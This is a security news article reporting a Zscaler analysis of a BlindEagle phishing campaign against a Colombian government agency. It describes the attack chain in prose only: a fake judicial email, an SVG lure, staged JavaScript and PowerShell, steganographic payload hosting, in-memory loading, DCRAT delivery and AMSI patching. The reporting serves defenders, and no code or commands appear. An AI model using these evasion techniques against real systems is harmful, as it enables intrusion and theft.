BlindEagle, a South American threat group, has launched a sophisticated campaign against Colombian government agencies, demonstrating an alarming evolution in attack techniques.
In early September 2025, the group targeted a government agency under the Ministry of Commerce, Industry and Tourism (MCIT) using coordinated phishing emails and multi-stage malware delivery.
This attack represents a significant escalation in the complexity and sophistication of BlindEagle’s operations, moving beyond basic malware deployment to a carefully orchestrated chain involving several malicious components.
The attack begins with a strategically crafted phishing email impersonating the Colombian judicial system.
The email uses legal terminology and official government formatting to create a sense of urgency, pressuring recipients to confirm receipt of what appears to be a labor lawsuit notification.
Remarkably, the phishing email was sent from a compromised account within the same organization, lending credibility to the message and bypassing conventional email security measures.
This internal compromise allowed the attackers to exploit trust relationships and avoid detection by security protocols that typically flag external threats.
Zscaler analysts identified the complete attack chain and determined that BlindEagle employed an unusually complex file-less methodology to evade detection systems.
.webp "BlindEagle Hackers Attacking Government Agencies with Powershell Scripts 3")
The initial attachment is an SVG (Scalable Vector Graphics) image containing encoded HTML that directs users to a fraudulent web portal mimicking the legitimate Colombian judicial branch.
Once a user interacts with this portal, the attack chain unfolds through three JavaScript files and a PowerShell command, each stage progressively deobfuscating the next component through various encoding techniques, including Base64 and custom obfuscation algorithms.
Infection mechanism
The infection mechanism demonstrates particular sophistication through the use of steganography and legitimate services for payload delivery.
JavaScript files in the attack chain use intricate deobfuscation routines where integer arrays are converted to executable code.
The PowerShell command downloads an image file from the Internet Archive, extracts a Base64-encoded malicious payload hidden within it, and loads the payload directly into memory using .NET reflection.
.webp "BlindEagle Hackers Attacking Government Agencies with Powershell Scripts 4")
This in-memory execution prevents any malicious file from touching the disk, significantly complicating detection efforts for traditional file-based security solutions.
The PowerShell script executes Caminho, a downloader malware with Portuguese language artifacts in its code, which then retrieves DCRAT through Discord’s content delivery network.
DCRAT includes advanced evasion capabilities, notably patching Microsoft’s Antimalware Scan Interface (AMSI) to disable detection mechanisms.
.webp "BlindEagle Hackers Attacking Government Agencies with Powershell Scripts 5")
The malware establishes persistence through scheduled tasks and registry modifications, providing attackers sustained access to compromised systems.
This campaign showcases BlindEagle’s maturation as a threat actor, combining social engineering expertise with technical proficiency in obfuscation, steganography, and legitimate service abuse to conduct targeted attacks against government infrastructure with minimal detection risk.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
